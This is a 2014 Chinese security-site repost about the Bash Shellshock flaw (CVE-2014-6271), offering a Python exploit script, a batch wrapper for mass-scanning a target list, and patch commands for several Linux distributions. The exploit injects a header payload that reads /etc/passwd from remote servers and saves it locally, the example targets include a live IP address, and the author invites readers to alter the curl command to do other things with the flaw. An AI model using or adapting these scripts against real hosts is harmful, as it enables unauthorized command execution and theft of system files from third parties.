安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 神兵利刃 > Bash漏洞批量检测工具与修复方案

Bash漏洞批量检测工具与修复方案

时间:2014-10-09来源: 作者:ziwen点击:
Linux官方内置Bash中新发现一个非常严重安全漏洞,黑客可以利用该Bash漏洞完全控制目标系统并发起攻击。Bash远程命令执行漏洞(CVE2014-6271)检测脚本作者:ziwen(dn8.net团队)运行环境:python 2.7‍‍#!/us…

//copyright AnYun.ORG

Linux官方内置Bash中新发现一个非常严重安全漏洞,黑客可以利用该Bash漏洞完全控制目标系统并发起攻击。

//ANYUN.ORG

Bash远程命令执行漏洞(CVE2014-6271)检测脚本

//内容来自安云网

作者:ziwen(dn8.net团队)

//安云网咨询系统

运行环境:python 2.7 //内容来自安云网

#!/usr/bin/env python
#coding:utf-8
import os
import sys
import re
print "f4ck ziwen cve 2014 6271 exp attacking!"
if sys.argv[1].startswith('-'):
    option = sys.argv[1][1:]
    if option == 'url':
        b=sys.argv[2]
        if not re.match("http",sys.argv[2]):
            print "URL格式错误 正确格式例如http://www.baidu.com/1.cgi"
        
        else:
            out=re.sub("\.|\/","",b)
            out=out[7:]
            print "shahdashhdd",out,b
            a="curl -H \'x: () { :;};a=`/bin/cat /etc/passwd`;echo \"a: $a\"' '"+b+"' -I -o "+out+"\"output\".txt"
            os.system(a)
            f = open(out+"output.txt", 'r')
            a=f.read()
            if re.search("root|bin\/bash",a):
                print "target possible have bug under is *nix passwd file"
                print a
            else:
                f.close()
                os.remove(out+"output.txt")
                print "possible dont have bug! or have a waf!"
    else:
        print "error! U can email to me U question ([email protected])"
        print option //安云网,anyun.org 

下载地址

//本文来自安云网

脚本会将结果回显出来 如果存在漏洞的话还会把passwd文件保存在以目标域名+output命名的txt文档里,不成功不保存 //内容来自安云网

执行方法
//本文来自安云网

python c:\exp.py -url
 http://23.239.208.105/cgi-bin/poc.cgi //内容来自AnYun.ORG 

批量检测是否存在Bash远程命令执行漏洞

//本文来自安云网

#!/usr/bin/env python
#coding:utf-8
import os
import sys
PATH=sys.path[0]+"/"
text=open(PATH+"target.txt",'r')
for line in text:
    print line
    os.system("python "+PATH+"exp.py -url "+line) 

//copyright AnYun.ORG

下载地址

//安云网咨询系统

该脚本调用了上面那个EXP 所以请运行该脚本时请将两个脚本放同一目录 并在该目录下新建target.txt文件将您的目标列表放进文件里
如:
http://www.baidu.com
http://23.239.208.105/cgi-bin/poc.cgi
然后运行该脚本即可 该脚本便会自动按顺序检测 会把结果回显出来 并会把成功的目标的passwd文件保存在 以目标域名+output命名的txt文档里,不成功不保存

//内容来自AnYun.ORG

请不要随意改变exp.py的文件名 如果改变了EXP.PY的文件名请将batch.py里面的exp.py改为您修改的文件名 否则batch.py会运行失败

//ANYUN.ORG

其他

//安云网,anyun.org

linux如果用不了上面那个版本请试下这个Linux专版
http://pan.baidu.com/s/1hq7oCYw
windows用不了请试试下面这个windows专版
http://pan.baidu.com/s/1kTmjNKV //内容来自安云网

如果需要生成其他文件或者利用漏洞做其他事请自行修改脚本中的curl命令
个别报错报CURL命令错误的是CURL版本问题,不是我脚本问题,我这边多个基友都测试了无误 //内容来自安云网

漏洞修复方案 //本文来自安云网

请您根据Linux版本选择您需要修复的命令, 为了防止意外情况发生,建议您执行命令前先对Linux服务器系统盘打个快照,如果万一出现升级影响您服务器使用情况,可以通过回滚系统盘快照解决。  
 
centos:(最终解决方案) 

//安云网咨询系统

yum clean all 
yum makecache 
yum -y update bash 
//内容来自AnYun.ORG

ubuntu:(最终解决方案) 
//内容来自AnYun.ORG

apt-get update 
apt-get -y install --only-upgrade bash 
//ANYUN.ORG

debian:(最终解决方案) 
//安云网,anyun.org

7.5  64bit && 32bit  
//ANYUN.ORG

apt-get update 
apt-get -y install --only-upgrade bash 

//内容来自AnYun.ORG

6.0.x 64bit  
//copyright AnYun.ORG

wget http://mirrors.aliyun.com/debian/pool/main/b/bash/bash_4.1-3+deb6u2_amd64.deb &&  dpkg -i bash_4.1-3+deb6u2_amd64.deb 

//ANYUN.ORG

6.0.x 32bit  

//copyright AnYun.ORG

wget http://mirrors.aliyun.com/debian/pool/main/b/bash/bash_4.1-3+deb6u2_i386.deb &&  dpkg -i bash_4.1-3+deb6u2_i386.deb //安云网,anyun.org 

aliyun linux:(最终解决方案) 
5.x 64bit  
//内容来自AnYun.ORG

wget http://mirrors.aliyun.com/centos/5/updates/x86_64/RPMS/bash-3.2-33.el5_10.4.x86_64.rpm && rpm -Uvh bash-3.2-33.el5_10.4.x86_64.rpm 

//copyright AnYun.ORG

5.x 32bit  
//安云网,anyun.org

wget http://mirrors.aliyun.com/centos/5/updates/i386/RPMS/bash-3.2-33.el5_10.4.i386.rpm  && rpm -Uvh bash-3.2-33.el5_10.4.i386.rpm 

//本文来自安云网

opensuse:(最终解决方案) 

//本文来自安云网

zypper clean 
zypper refresh 
zypper update -y bash 
//本文来自安云网

[参考信息来源:http://bbs.aliyun.com/read/176977.html?spm=5176.7189909.3.15.sZTgst,转载请注明来自FreeBuf.COM] //ANYUN.ORG

//copyright AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容